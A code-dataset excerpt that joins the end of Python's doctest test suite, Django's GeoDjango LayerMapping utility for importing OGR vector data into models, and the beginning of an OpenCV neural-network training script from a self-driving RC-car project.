>>> globs = {'favorite_color': 'blue'}
>>> doctest.testfile('test_doctest.txt', globs=globs)
TestResults(failed=0, attempted=2)
>>> doctest.master = None # Reset master.
>>> extraglobs = {'favorite_color': 'red'}
>>> doctest.testfile('test_doctest.txt', globs=globs,
... extraglobs=extraglobs) # doctest: +ELLIPSIS
**********************************************************************
File "...", line 6, in test_doctest.txt
Failed example:
favorite_color
Expected:
'blue'
Got:
'red'
**********************************************************************
1 items had failures:
1 of 2 in test_doctest.txt
***Test Failed*** 1 failures.
TestResults(failed=1, attempted=2)
>>> doctest.master = None # Reset master.
The file may be made relative to a given module or package, using the
optional `module_relative` parameter:
>>> doctest.testfile('test_doctest.txt', globs=globs,
... module_relative='test')
TestResults(failed=0, attempted=2)
>>> doctest.master = None # Reset master.
Verbosity can be increased with the optional `verbose` parameter:
>>> doctest.testfile('test_doctest.txt', globs=globs, verbose=True)
Trying:
favorite_color
Expecting:
'blue'
ok
Trying:
if 1:
print('a')
print()
print('b')
Expecting:
a
<BLANKLINE>
b
ok
1 items passed all tests:
2 tests in test_doctest.txt
2 tests in 1 items.
2 passed and 0 failed.
Test passed.
TestResults(failed=0, attempted=2)
>>> doctest.master = None # Reset master.
The name of the test may be specified with the optional `name`
parameter:
>>> doctest.testfile('test_doctest.txt', name='newname')
... # doctest: +ELLIPSIS
**********************************************************************
File "...", line 6, in newname
...
TestResults(failed=1, attempted=2)
>>> doctest.master = None # Reset master.
The summary report may be suppressed with the optional `report`
parameter:
>>> doctest.testfile('test_doctest.txt', report=False)
... # doctest: +ELLIPSIS
**********************************************************************
File "...", line 6, in test_doctest.txt
Failed example:
favorite_color
Exception raised:
...
NameError: name 'favorite_color' is not defined
TestResults(failed=1, attempted=2)
>>> doctest.master = None # Reset master.
The optional keyword argument `raise_on_error` can be used to raise an
exception on the first error (which may be useful for postmortem
debugging):
>>> doctest.testfile('test_doctest.txt', raise_on_error=True)
... # doctest: +ELLIPSIS
Traceback (most recent call last):
doctest.UnexpectedException: ...
>>> doctest.master = None # Reset master.
If the tests contain non-ASCII characters, the tests might fail, since
it's unknown which encoding is used. The encoding can be specified
using the optional keyword argument `encoding`:
>>> doctest.testfile('test_doctest4.txt', encoding='latin-1') # doctest: +ELLIPSIS
**********************************************************************
File "...", line 7, in test_doctest4.txt
Failed example:
'...'
Expected:
'f\xf6\xf6'
Got:
'f\xc3\xb6\xc3\xb6'
**********************************************************************
...
**********************************************************************
1 items had failures:
2 of 2 in test_doctest4.txt
***Test Failed*** 2 failures.
TestResults(failed=2, attempted=2)
>>> doctest.master = None # Reset master.
>>> doctest.testfile('test_doctest4.txt', encoding='utf-8')
TestResults(failed=0, attempted=2)
>>> doctest.master = None # Reset master.
Test the verbose output:
>>> doctest.testfile('test_doctest4.txt', encoding='utf-8', verbose=True)
Trying:
'föö'
Expecting:
'f\xf6\xf6'
ok
Trying:
'bąr'
Expecting:
'b\u0105r'
ok
1 items passed all tests:
2 tests in test_doctest4.txt
2 tests in 1 items.
2 passed and 0 failed.
Test passed.
TestResults(failed=0, attempted=2)
>>> doctest.master = None # Reset master.
>>> sys.argv = save_argv
"""
def test_testmod(): r"""
Tests for the testmod function. More might be useful, but for now we're just
testing the case raised by Issue 6195, where trying to doctest a C module would
fail with a UnicodeDecodeError because doctest tried to read the "source" lines
out of the binary module.
>>> import unicodedata
>>> doctest.testmod(unicodedata, verbose=False)
TestResults(failed=0, attempted=0)
"""
try:
os.fsencode("foo-bär@baz.py")
except UnicodeEncodeError:
# Skip the test: the filesystem encoding is unable to encode the filename
pass
else:
def test_unicode(): """
Check doctest with a non-ascii filename:
>>> doc = '''
... >>> raise Exception('clé')
... '''
...
>>> parser = doctest.DocTestParser()
>>> test = parser.get_doctest(doc, {}, "foo-bär@baz", "foo-bär@baz.py", 0)
>>> test
<DocTest foo-bär@baz from foo-bär@baz.py:0 (1 example)>
>>> runner = doctest.DocTestRunner(verbose=False)
>>> runner.run(test) # doctest: +ELLIPSIS
**********************************************************************
File "foo-bär@baz.py", line 2, in foo-bär@baz
Failed example:
raise Exception('clé')
Exception raised:
Traceback (most recent call last):
File ...
compileflags, 1), test.globs)
File "<doctest foo-bär@baz[0]>", line 1, in <module>
raise Exception('clé')
Exception: clé
TestResults(failed=1, attempted=1)
"""
def test_CLI(): r"""
The doctest module can be used to run doctests against an arbitrary file.
These tests test this CLI functionality.
We'll use the support module's script_helpers for this, and write test files
to a temp dir to run the command against. Due to a current limitation in
script_helpers, though, we need a little utility function to turn the returned
output into something we can doctest against:
>>> def normalize(s):
... return '\n'.join(s.decode().splitlines())
Note: we also pass TERM='' to all the assert_python calls to avoid a bug
in the readline library that is triggered in these tests because we are
running them in a new python process. See:
http://lists.gnu.org/archive/html/bug-readline/2013-06/msg00000.html
With those preliminaries out of the way, we'll start with a file with two
simple tests and no errors. We'll run both the unadorned doctest command, and
the verbose version, and then check the output:
>>> from test import script_helper
>>> with script_helper.temp_dir() as tmpdir:
... fn = os.path.join(tmpdir, 'myfile.doc')
... with open(fn, 'w') as f:
... _ = f.write('This is a very simple test file.\n')
... _ = f.write(' >>> 1 + 1\n')
... _ = f.write(' 2\n')
... _ = f.write(' >>> "a"\n')
... _ = f.write(" 'a'\n")
... _ = f.write('\n')
... _ = f.write('And that is it.\n')
... rc1, out1, err1 = script_helper.assert_python_ok(
... '-m', 'doctest', fn, TERM='')
... rc2, out2, err2 = script_helper.assert_python_ok(
... '-m', 'doctest', '-v', fn, TERM='')
With no arguments and passing tests, we should get no output:
>>> rc1, out1, err1
(0, b'', b'')
With the verbose flag, we should see the test output, but no error output:
>>> rc2, err2
(0, b'')
>>> print(normalize(out2))
Trying:
1 + 1
Expecting:
2
ok
Trying:
"a"
Expecting:
'a'
ok
1 items passed all tests:
2 tests in myfile.doc
2 tests in 1 items.
2 passed and 0 failed.
Test passed.
Now we'll write a couple files, one with three tests, the other a python module
with two tests, both of the files having "errors" in the tests that can be made
non-errors by applying the appropriate doctest options to the run (ELLIPSIS in
the first file, NORMALIZE_WHITESPACE in the second). This combination will
allow us to thoroughly test the -f and -o flags, as well as the doctest command's
ability to process more than one file on the command line and, since the second
file ends in '.py', its handling of python module files (as opposed to straight
text files).
>>> from test import script_helper
>>> with script_helper.temp_dir() as tmpdir:
... fn = os.path.join(tmpdir, 'myfile.doc')
... with open(fn, 'w') as f:
... _ = f.write('This is another simple test file.\n')
... _ = f.write(' >>> 1 + 1\n')
... _ = f.write(' 2\n')
... _ = f.write(' >>> "abcdef"\n')
... _ = f.write(" 'a...f'\n")
... _ = f.write(' >>> "ajkml"\n')
... _ = f.write(" 'a...l'\n")
... _ = f.write('\n')
... _ = f.write('And that is it.\n')
... fn2 = os.path.join(tmpdir, 'myfile2.py')
... with open(fn2, 'w') as f:
... _ = f.write('def test_func():\n')
... _ = f.write(' \"\"\"\n')
... _ = f.write(' This is a simple python test function.\n')
... _ = f.write(' >>> 1 + 1\n')
... _ = f.write(' 2\n')
... _ = f.write(' >>> "abc def"\n')
... _ = f.write(" 'abc def'\n")
... _ = f.write("\n")
... _ = f.write(' \"\"\"\n')
... import shutil
... rc1, out1, err1 = script_helper.assert_python_failure(
... '-m', 'doctest', fn, fn2, TERM='')
... rc2, out2, err2 = script_helper.assert_python_ok(
... '-m', 'doctest', '-o', 'ELLIPSIS', fn, TERM='')
... rc3, out3, err3 = script_helper.assert_python_ok(
... '-m', 'doctest', '-o', 'ELLIPSIS',
... '-o', 'NORMALIZE_WHITESPACE', fn, fn2, TERM='')
... rc4, out4, err4 = script_helper.assert_python_failure(
... '-m', 'doctest', '-f', fn, fn2, TERM='')
... rc5, out5, err5 = script_helper.assert_python_ok(
... '-m', 'doctest', '-v', '-o', 'ELLIPSIS',
... '-o', 'NORMALIZE_WHITESPACE', fn, fn2, TERM='')
Our first test run will show the errors from the first file (doctest stops if a
file has errors). Note that doctest test-run error output appears on stdout,
not stderr:
>>> rc1, err1
(1, b'')
>>> print(normalize(out1)) # doctest: +ELLIPSIS
**********************************************************************
File "...myfile.doc", line 4, in myfile.doc
Failed example:
"abcdef"
Expected:
'a...f'
Got:
'abcdef'
**********************************************************************
File "...myfile.doc", line 6, in myfile.doc
Failed example:
"ajkml"
Expected:
'a...l'
Got:
'ajkml'
**********************************************************************
1 items had failures:
2 of 3 in myfile.doc
***Test Failed*** 2 failures.
With -o ELLIPSIS specified, the second run, against just the first file, should
produce no errors, and with -o NORMALIZE_WHITESPACE also specified, neither
should the third, which ran against both files:
>>> rc2, out2, err2
(0, b'', b'')
>>> rc3, out3, err3
(0, b'', b'')
The fourth run uses FAIL_FAST, so we should see only one error:
>>> rc4, err4
(1, b'')
>>> print(normalize(out4)) # doctest: +ELLIPSIS
**********************************************************************
File "...myfile.doc", line 4, in myfile.doc
Failed example:
"abcdef"
Expected:
'a...f'
Got:
'abcdef'
**********************************************************************
1 items had failures:
1 of 2 in myfile.doc
***Test Failed*** 1 failures.
The fifth test uses verbose with the two options, so we should get verbose
success output for the tests in both files:
>>> rc5, err5
(0, b'')
>>> print(normalize(out5))
Trying:
1 + 1
Expecting:
2
ok
Trying:
"abcdef"
Expecting:
'a...f'
ok
Trying:
"ajkml"
Expecting:
'a...l'
ok
1 items passed all tests:
3 tests in myfile.doc
3 tests in 1 items.
3 passed and 0 failed.
Test passed.
Trying:
1 + 1
Expecting:
2
ok
Trying:
"abc def"
Expecting:
'abc def'
ok
1 items had no tests:
myfile2
1 items passed all tests:
2 tests in myfile2.test_func
2 tests in 2 items.
2 passed and 0 failed.
Test passed.
We should also check some typical error cases.
Invalid file name:
>>> rc, out, err = script_helper.assert_python_failure(
... '-m', 'doctest', 'nosuchfile', TERM='')
>>> rc, out
(1, b'')
>>> print(normalize(err)) # doctest: +ELLIPSIS
Traceback (most recent call last):
...
FileNotFoundError: [Errno ...] No such file or directory: 'nosuchfile'
Invalid doctest option:
>>> rc, out, err = script_helper.assert_python_failure(
... '-m', 'doctest', '-o', 'nosuchoption', TERM='')
>>> rc, out
(2, b'')
>>> print(normalize(err)) # doctest: +ELLIPSIS
usage...invalid...nosuchoption...
"""
######################################################################
## Main
######################################################################
def test_main():
# Check the doctest cases in doctest itself:
support.run_doctest(doctest, verbosity=True)
# Check the doctest cases defined here:
from test import test_doctest
support.run_doctest(test_doctest, verbosity=True)
import sys, re, io
def test_coverage(coverdir):
trace = support.import_module('trace')
tracer = trace.Trace(ignoredirs=[sys.base_prefix, sys.base_exec_prefix,],
trace=0, count=1)
tracer.run('test_main()')
r = tracer.results()
print('Writing coverage results...')
r.write_results(show_missing=True, summary=True,
coverdir=coverdir)
if __name__ == '__main__':
if '-c' in sys.argv:
test_coverage('/tmp/doctest.cover')
else:
test_main()
| gpl-2.0 |
nzavagli/UnrealPy | UnrealPyEmbed/Development/Python/2015.08.07-Python2710-x64-Source-vs2015/Python27/Source/django-1.8.2/django/contrib/gis/utils/layermapping.py | 61 | 27288 | # LayerMapping -- A Django Model/OGR Layer Mapping Utility
"""
The LayerMapping class provides a way to map the contents of OGR
vector files (e.g. SHP files) to Geographic-enabled Django models.
For more information, please consult the GeoDjango documentation:
https://docs.djangoproject.com/en/dev/ref/contrib/gis/layermapping/
"""
import sys
from decimal import Decimal, InvalidOperation as DecimalInvalidOperation
from django.contrib.gis.db.models import GeometryField
from django.contrib.gis.gdal import (
CoordTransform, DataSource, GDALException, OGRGeometry, OGRGeomType,
SpatialReference,
)
from django.contrib.gis.gdal.field import (
OFTDate, OFTDateTime, OFTInteger, OFTReal, OFTString, OFTTime,
)
from django.core.exceptions import FieldDoesNotExist, ObjectDoesNotExist
from django.db import connections, models, router, transaction
from django.utils import six
from django.utils.encoding import force_text
# LayerMapping exceptions.
class LayerMapError(Exception):
pass
class InvalidString(LayerMapError):
pass
class InvalidDecimal(LayerMapError):
pass
class InvalidInteger(LayerMapError):
pass
class MissingForeignKey(LayerMapError):
pass
class LayerMapping(object):
"A class that maps OGR Layers to GeoDjango Models."
# Acceptable 'base' types for a multi-geometry type.
MULTI_TYPES = {1: OGRGeomType('MultiPoint'),
2: OGRGeomType('MultiLineString'),
3: OGRGeomType('MultiPolygon'),
OGRGeomType('Point25D').num: OGRGeomType('MultiPoint25D'),
OGRGeomType('LineString25D').num: OGRGeomType('MultiLineString25D'),
OGRGeomType('Polygon25D').num: OGRGeomType('MultiPolygon25D'),
}
# Acceptable Django field types and corresponding acceptable OGR
# counterparts.
FIELD_TYPES = {
models.AutoField: OFTInteger,
models.IntegerField: (OFTInteger, OFTReal, OFTString),
models.FloatField: (OFTInteger, OFTReal),
models.DateField: OFTDate,
models.DateTimeField: OFTDateTime,
models.EmailField: OFTString,
models.TimeField: OFTTime,
models.DecimalField: (OFTInteger, OFTReal),
models.CharField: OFTString,
models.SlugField: OFTString,
models.TextField: OFTString,
models.URLField: OFTString,
models.BigIntegerField: (OFTInteger, OFTReal, OFTString),
models.SmallIntegerField: (OFTInteger, OFTReal, OFTString),
models.PositiveSmallIntegerField: (OFTInteger, OFTReal, OFTString),
}
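# Reading the table above: an OGR OFTReal column may populate, e.g., a
# FloatField or DecimalField, while a DateField accepts only OFTDate.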
def __init__(self, model, data, mapping, layer=0,
source_srs=None, encoding='utf-8',
transaction_mode='commit_on_success',
transform=True, unique=None, using=None):
"""
A LayerMapping object is initialized using the given Model (not an instance),
a DataSource (or string path to an OGR-supported data file), and a mapping
dictionary. See the module level docstring for more details and keyword
argument usage.
"""
# Getting the DataSource and the associated Layer.
if isinstance(data, six.string_types):
self.ds = DataSource(data, encoding=encoding)
else:
self.ds = data
self.layer = self.ds[layer]
self.using = using if using is not None else router.db_for_write(model)
self.spatial_backend = connections[self.using].ops
# Setting the mapping & model attributes.
self.mapping = mapping
self.model = model
# Checking the layer -- initialization of the object will fail if
# things don't check out beforehand.
self.check_layer()
# Getting the geometry column associated with the model (an
# exception will be raised if there is no geometry column).
if connections[self.using].features.supports_transform:
self.geo_field = self.geometry_field()
else:
transform = False
# Checking the source spatial reference system, and getting
# the coordinate transformation object (unless the `transform`
# keyword is set to False)
if transform:
self.source_srs = self.check_srs(source_srs)
self.transform = self.coord_transform()
else:
self.transform = transform
# Setting the encoding for OFTString fields, if specified.
if encoding:
# Making sure the encoding exists, if not a LookupError
# exception will be thrown.
from codecs import lookup
lookup(encoding)
self.encoding = encoding
else:
self.encoding = None
if unique:
self.check_unique(unique)
transaction_mode = 'autocommit' # Has to be set to autocommit.
self.unique = unique
else:
self.unique = None
# Setting the transaction decorator with the function in the
# transaction modes dictionary.
self.transaction_mode = transaction_mode
if transaction_mode == 'autocommit':
self.transaction_decorator = None
elif transaction_mode == 'commit_on_success':
self.transaction_decorator = transaction.atomic
else:
raise LayerMapError('Unrecognized transaction mode: %s' % transaction_mode)
# #### Checking routines used during initialization ####
def check_fid_range(self, fid_range):
"This checks the `fid_range` keyword."
if fid_range:
if isinstance(fid_range, (tuple, list)):
return slice(*fid_range)
elif isinstance(fid_range, slice):
return fid_range
else:
raise TypeError
else:
return None
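# For example (illustrative): fid_range=(10, 50) yields slice(10, 50),
# restricting the mapping to features 10 through 49 of the layer.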
def check_layer(self):
"""
This checks the Layer metadata, and ensures that it is compatible
with the mapping information and model. Unlike previous revisions,
there is no need to increment through each feature in the Layer.
"""
# The geometry field of the model is set here.
# TODO: Support more than one geometry field / model. However, this
# depends on the GDAL Driver in use.
self.geom_field = False
self.fields = {}
# Getting lists of the field names and the field types available in
# the OGR Layer.
ogr_fields = self.layer.fields
ogr_field_types = self.layer.field_types
# Function for determining if the OGR mapping field is in the Layer.
def check_ogr_fld(ogr_map_fld):
try:
idx = ogr_fields.index(ogr_map_fld)
except ValueError:
raise LayerMapError('Given mapping OGR field "%s" not found in OGR Layer.' % ogr_map_fld)
return idx
# No need to increment through each feature in the model, simply check
# the Layer metadata against what was given in the mapping dictionary.
for field_name, ogr_name in self.mapping.items():
# Ensuring that a corresponding field exists in the model
# for the given field name in the mapping.
try:
model_field = self.model._meta.get_field(field_name)
except FieldDoesNotExist:
raise LayerMapError('Given mapping field "%s" not in given Model fields.' % field_name)
# Getting the string name for the Django field class (e.g., 'PointField').
fld_name = model_field.__class__.__name__
if isinstance(model_field, GeometryField):
if self.geom_field:
raise LayerMapError('LayerMapping does not support more than one GeometryField per model.')
# Getting the coordinate dimension of the geometry field.
coord_dim = model_field.dim
try:
if coord_dim == 3:
gtype = OGRGeomType(ogr_name + '25D')
else:
gtype = OGRGeomType(ogr_name)
except GDALException:
raise LayerMapError('Invalid mapping for GeometryField "%s".' % field_name)
# Making sure that the OGR Layer's Geometry is compatible.
ltype = self.layer.geom_type
if not (ltype.name.startswith(gtype.name) or self.make_multi(ltype, model_field)):
raise LayerMapError('Invalid mapping geometry; model has %s%s, '
'layer geometry type is %s.' %
(fld_name, '(dim=3)' if coord_dim == 3 else '', ltype))
# Setting the `geom_field` attribute w/the name of the model field
# that is a Geometry. Also setting the coordinate dimension
# attribute.
self.geom_field = field_name
self.coord_dim = coord_dim
fields_val = model_field
elif isinstance(model_field, models.ForeignKey):
if isinstance(ogr_name, dict):
# Is every given related model mapping field in the Layer?
rel_model = model_field.rel.to
for rel_name, ogr_field in ogr_name.items():
idx = check_ogr_fld(ogr_field)
try:
rel_model._meta.get_field(rel_name)
except FieldDoesNotExist:
raise LayerMapError('ForeignKey mapping field "%s" not in %s fields.' %
(rel_name, rel_model.__class__.__name__))
fields_val = rel_model
else:
raise TypeError('ForeignKey mapping must be of dictionary type.')
else:
# Is the model field type supported by LayerMapping?
if model_field.__class__ not in self.FIELD_TYPES:
raise LayerMapError('Django field type "%s" has no OGR mapping (yet).' % fld_name)
# Is the OGR field in the Layer?
idx = check_ogr_fld(ogr_name)
ogr_field = ogr_field_types[idx]
# Can the OGR field type be mapped to the Django field type?
if not issubclass(ogr_field, self.FIELD_TYPES[model_field.__class__]):
raise LayerMapError('OGR field "%s" (of type %s) cannot be mapped to Django %s.' %
(ogr_field, ogr_field.__name__, fld_name))
fields_val = model_field
self.fields[field_name] = fields_val
def check_srs(self, source_srs):
"Checks the compatibility of the given spatial reference object."
if isinstance(source_srs, SpatialReference):
sr = source_srs
elif isinstance(source_srs, self.spatial_backend.spatial_ref_sys()):
sr = source_srs.srs
elif isinstance(source_srs, (int, six.string_types)):
sr = SpatialReference(source_srs)
else:
# Otherwise just pulling the SpatialReference from the layer
sr = self.layer.srs
if not sr:
raise LayerMapError('No source reference system defined.')
else:
return sr
def check_unique(self, unique):
"Checks the `unique` keyword parameter -- may be a sequence or string."
if isinstance(unique, (list, tuple)):
# List of fields to determine uniqueness with
for attr in unique:
if attr not in self.mapping:
raise ValueError
elif isinstance(unique, six.string_types):
# Only a single field passed in.
if unique not in self.mapping:
raise ValueError
else:
raise TypeError('Unique keyword argument must be set with a tuple, list, or string.')
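# For example (illustrative): unique='name' requires 'name' to be a key of
# the mapping dict, while unique=('name', 'state') deduplicates on the
# combination of both mapped fields.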
# Keyword argument retrieval routines ####
def feature_kwargs(self, feat):
"""
Given an OGR Feature, this will return a dictionary of keyword arguments
for constructing the mapped model.
"""
# The keyword arguments for model construction.
kwargs = {}
# Incrementing through each model field and OGR field in the
# dictionary mapping.
for field_name, ogr_name in self.mapping.items():
model_field = self.fields[field_name]
if isinstance(model_field, GeometryField):
# Verify OGR geometry.
try:
val = self.verify_geom(feat.geom, model_field)
except GDALException:
raise LayerMapError('Could not retrieve geometry from feature.')
elif isinstance(model_field, models.base.ModelBase):
# The related _model_, not a field was passed in -- indicating
# another mapping for the related Model.
val = self.verify_fk(feat, model_field, ogr_name)
else:
# Otherwise, verify OGR Field type.
val = self.verify_ogr_field(feat[ogr_name], model_field)
# Setting the keyword arguments for the field name with the
# value obtained above.
kwargs[field_name] = val
return kwargs
def unique_kwargs(self, kwargs):
"""
Given the feature keyword arguments (from `feature_kwargs`) this routine
will construct and return the uniqueness keyword arguments -- a subset
of the feature kwargs.
"""
if isinstance(self.unique, six.string_types):
return {self.unique: kwargs[self.unique]}
else:
return {fld: kwargs[fld] for fld in self.unique}
# #### Verification routines used in constructing model keyword arguments. ####
def verify_ogr_field(self, ogr_field, model_field):
"""
Verifies if the OGR Field contents are acceptable to the Django
model field. If they are, the verified value is returned,
otherwise the proper exception is raised.
"""
if (isinstance(ogr_field, OFTString) and
isinstance(model_field, (models.CharField, models.TextField))):
if self.encoding:
# The encoding for OGR data sources may be specified here
# (e.g., 'cp437' for Census Bureau boundary files).
val = force_text(ogr_field.value, self.encoding)
else:
val = ogr_field.value
if model_field.max_length and len(val) > model_field.max_length:
raise InvalidString('%s model field maximum string length is %s, given %s characters.' %
(model_field.name, model_field.max_length, len(val)))
elif isinstance(ogr_field, OFTReal) and isinstance(model_field, models.DecimalField):
try:
# Creating an instance of the Decimal value to use.
d = Decimal(str(ogr_field.value))
except DecimalInvalidOperation:
raise InvalidDecimal('Could not construct decimal from: %s' % ogr_field.value)
# Getting the decimal value as a tuple.
dtup = d.as_tuple()
digits = dtup[1]
d_idx = dtup[2] # index where the decimal is
# Maximum amount of precision, or digits to the left of the decimal.
max_prec = model_field.max_digits - model_field.decimal_places
# Getting the digits to the left of the decimal place for the
# given decimal.
if d_idx < 0:
n_prec = len(digits[:d_idx])
else:
n_prec = len(digits) + d_idx
# If we have more than the maximum digits allowed, then throw an
# InvalidDecimal exception.
if n_prec > max_prec:
raise InvalidDecimal(
'A DecimalField with max_digits %d, decimal_places %d must '
'round to an absolute value less than 10^%d.' %
(model_field.max_digits, model_field.decimal_places, max_prec)
)
val = d
elif isinstance(ogr_field, (OFTReal, OFTString)) and isinstance(model_field, models.IntegerField):
# Attempt to convert any OFTReal and OFTString value to an OFTInteger.
try:
val = int(ogr_field.value)
except ValueError:
raise InvalidInteger('Could not construct integer from: %s' % ogr_field.value)
else:
val = ogr_field.value
return val
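# Worked example of the DecimalField precision check above (illustrative):
# Decimal('123.45').as_tuple() gives digits=(1, 2, 3, 4, 5), exponent=-2,
# so d_idx=-2 and n_prec=len(digits[:-2])=3 digits left of the decimal
# point. With max_digits=5 and decimal_places=2, max_prec=3, so '123.45'
# passes while '1234.5' (n_prec=4) raises InvalidDecimal.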
def verify_fk(self, feat, rel_model, rel_mapping):
"""
Given an OGR Feature, the related model and its dictionary mapping,
this routine will retrieve the related model for the ForeignKey
mapping.
"""
# TODO: It is expensive to retrieve a model for every record --
# explore if an efficient mechanism exists for caching related
# ForeignKey models.
# Constructing and verifying the related model keyword arguments.
fk_kwargs = {}
for field_name, ogr_name in rel_mapping.items():
fk_kwargs[field_name] = self.verify_ogr_field(feat[ogr_name], rel_model._meta.get_field(field_name))
# Attempting to retrieve and return the related model.
try:
return rel_model.objects.using(self.using).get(**fk_kwargs)
except ObjectDoesNotExist:
raise MissingForeignKey(
'No ForeignKey %s model found with keyword arguments: %s' %
(rel_model.__name__, fk_kwargs)
)
def verify_geom(self, geom, model_field):
"""
Verifies the geometry -- will construct and return a GeometryCollection
if necessary (for example if the model field is MultiPolygonField while
the mapped shapefile only contains Polygons).
"""
# Downgrade a 3D geom to a 2D one, if necessary.
if self.coord_dim != geom.coord_dim:
geom.coord_dim = self.coord_dim
if self.make_multi(geom.geom_type, model_field):
# Constructing a multi-geometry type to contain the single geometry
multi_type = self.MULTI_TYPES[geom.geom_type.num]
g = OGRGeometry(multi_type)
g.add(geom)
else:
g = geom
# Transforming the geometry with our Coordinate Transformation object,
# but only if the class variable `transform` is set w/a CoordTransform
# object.
if self.transform:
g.transform(self.transform)
# Returning the WKT of the geometry.
return g.wkt
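# For instance (illustrative): mapping Polygon features onto a
# MultiPolygonField takes the make_multi() branch above -- each Polygon is
# wrapped in a fresh OGRGeometry('MultiPolygon') via add() before the
# optional coordinate transform and WKT serialization.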
# #### Other model methods ####
def coord_transform(self):
"Returns the coordinate transformation object."
SpatialRefSys = self.spatial_backend.spatial_ref_sys()
try:
# Getting the target spatial reference system
target_srs = SpatialRefSys.objects.using(self.using).get(srid=self.geo_field.srid).srs
# Creating the CoordTransform object
return CoordTransform(self.source_srs, target_srs)
except Exception as msg:
new_msg = 'Could not translate between the data source and model geometry: %s' % msg
six.reraise(LayerMapError, LayerMapError(new_msg), sys.exc_info()[2])
def geometry_field(self):
"Returns the GeometryField instance associated with the geographic column."
# Use `get_field()` on the model's options so that we
# get the correct field instance if there's model inheritance.
opts = self.model._meta
return opts.get_field(self.geom_field)
def make_multi(self, geom_type, model_field):
"""
Given the OGRGeomType for a geometry and its associated GeometryField,
determine whether the geometry should be turned into a GeometryCollection.
"""
return (geom_type.num in self.MULTI_TYPES and
model_field.__class__.__name__ == 'Multi%s' % geom_type.django)
def save(self, verbose=False, fid_range=False, step=False,
progress=False, silent=False, stream=sys.stdout, strict=False):
"""
Saves the contents from the OGR DataSource Layer into the database
according to the mapping dictionary given at initialization.
Keyword Parameters:
verbose:
If set, information will be printed subsequent to each model save
executed on the database.
fid_range:
May be set with a slice or tuple of (begin, end) feature IDs to map
from the data source. In other words, this keyword enables the user
to selectively import a subset range of features in the geographic
data source.
step:
If set with an integer, transactions will occur at every step
interval. For example, if step=1000, a commit would occur after
the 1,000th feature, the 2,000th feature etc.
progress:
When this keyword is set, status information will be printed giving
the number of features processed and successfully saved. By default,
progress information will be printed every 1000 features processed,
however, this default may be overridden by setting this keyword with an
integer for the desired interval.
stream:
Status information will be written to this file handle. Defaults to
using `sys.stdout`, but any object with a `write` method is supported.
silent:
By default, non-fatal error notifications are printed to stdout, but
this keyword may be set to disable these notifications.
strict:
Execution of the model mapping will cease upon the first error
encountered. The default behavior is to attempt to continue.
"""
# Getting the default Feature ID range.
default_range = self.check_fid_range(fid_range)
# Setting the progress interval, if requested.
if progress:
if progress is True or not isinstance(progress, int):
progress_interval = 1000
else:
progress_interval = progress
def _save(feat_range=default_range, num_feat=0, num_saved=0):
if feat_range:
layer_iter = self.layer[feat_range]
else:
layer_iter = self.layer
for feat in layer_iter:
num_feat += 1
# Getting the keyword arguments
try:
kwargs = self.feature_kwargs(feat)
except LayerMapError as msg:
# Something borked the validation
if strict:
raise
elif not silent:
stream.write('Ignoring Feature ID %s because: %s\n' % (feat.fid, msg))
else:
# Constructing the model using the keyword args
is_update = False
if self.unique:
# If we want unique models on a particular field, handle the
# geometry appropriately.
try:
# Getting the keyword arguments and retrieving
# the unique model.
u_kwargs = self.unique_kwargs(kwargs)
m = self.model.objects.using(self.using).get(**u_kwargs)
is_update = True
# Getting the geometry (in OGR form), creating
# one from the kwargs WKT, adding in additional
# geometries, and updating the attribute with the
# just-updated geometry WKT.
geom = getattr(m, self.geom_field).ogr
new = OGRGeometry(kwargs[self.geom_field])
for g in new:
geom.add(g)
setattr(m, self.geom_field, geom.wkt)
except ObjectDoesNotExist:
# No unique model exists yet, create.
m = self.model(**kwargs)
else:
m = self.model(**kwargs)
try:
# Attempting to save.
m.save(using=self.using)
num_saved += 1
if verbose:
stream.write('%s: %s\n' % ('Updated' if is_update else 'Saved', m))
except Exception as msg:
if strict:
# Bailing out if the `strict` keyword is set.
if not silent:
stream.write(
'Failed to save the feature (id: %s) into the '
'model with the keyword arguments:\n' % feat.fid
)
stream.write('%s\n' % kwargs)
raise
elif not silent:
stream.write('Failed to save %s:\n %s\nContinuing\n' % (kwargs, msg))
# Printing progress information, if requested.
if progress and num_feat % progress_interval == 0:
stream.write('Processed %d features, saved %d ...\n' % (num_feat, num_saved))
# Only used for status output purposes -- incremental saving uses the
# values returned here.
return num_saved, num_feat
if self.transaction_decorator is not None:
_save = self.transaction_decorator(_save)
nfeat = self.layer.num_feat
if step and isinstance(step, int) and step < nfeat:
# Incremental saving is requested at the given interval (step)
if default_range:
raise LayerMapError('The `step` keyword may not be used in conjunction with the `fid_range` keyword.')
beg, num_feat, num_saved = (0, 0, 0)
indices = range(step, nfeat, step)
n_i = len(indices)
for i, end in enumerate(indices):
# Constructing the slice to use for this step; the last slice is
# special (e.g., [100:] instead of [90:100]).
if i + 1 == n_i:
step_slice = slice(beg, None)
else:
step_slice = slice(beg, end)
try:
num_feat, num_saved = _save(step_slice, num_feat, num_saved)
beg = end
except: # Deliberately catch everything
stream.write('%s\nFailed to save slice: %s\n' % ('=-' * 20, step_slice))
raise
else:
# Otherwise, just calling the previously defined _save() function.
_save()
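# Hypothetical usage sketch (added; not part of the original module),
# assuming a model `City` with a `mpoly` geometry column and a shapefile
# whose layer matches the mapping below:
#
#   from django.contrib.gis.utils import LayerMapping
#   mapping = {'name': 'NAME', 'mpoly': 'MULTIPOLYGON'}
#   lm = LayerMapping(City, '/data/cities.shp', mapping)
#   # Commit every 500 features, print progress every 1000, abort on error:
#   lm.save(step=500, progress=True, strict=True)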
| mit |
aish9r/AutoRCCar | computer/mlp_training.py | 3 | 1864 | __author__ = 'zhengwang'
import cv2
import numpy as np
import glob
print 'Loading training data...'
e0 = cv2.getTickCount()
# load training data
image_array = np.zeros((1, 38400))
label_array = np.zeros((1, 4), 'float')
training_data = glob.glob('training_data/*.npz')
for single_npz in training_data:
with np.load(single_npz) as data:
print data.files
train_temp = data['train']
train_labels_temp = data['train_labels']
print train_temp.shape
print train_labels_temp.shape
image_array = np.vstack((image_array, train_temp))
label_array = np.vstack((label_array, train_labels_temp))
train = image_array[1:, :]
train_labels = label_array[1:, :]
print train.shape
print train_labels.shape
e00 = cv2.getTickCount()
time0 = (e00 - e0)/ cv2.getTickFrequency()
print 'Loading image duration:', time0
# set start time
e1 = cv2.getTickCount()
# create MLP
layer_sizes = np.int32([38400, 32, 4])
model = cv2.ANN_MLP()
model.create(layer_sizes)
criteria = (cv2.TERM_CRITERIA_COUNT | cv2.TERM_CRITERIA_EPS, 500, 0.0001)
criteria2 = (cv2.TERM_CRITERIA_COUNT, 100, 0.001)
params = dict(term_crit = criteria,
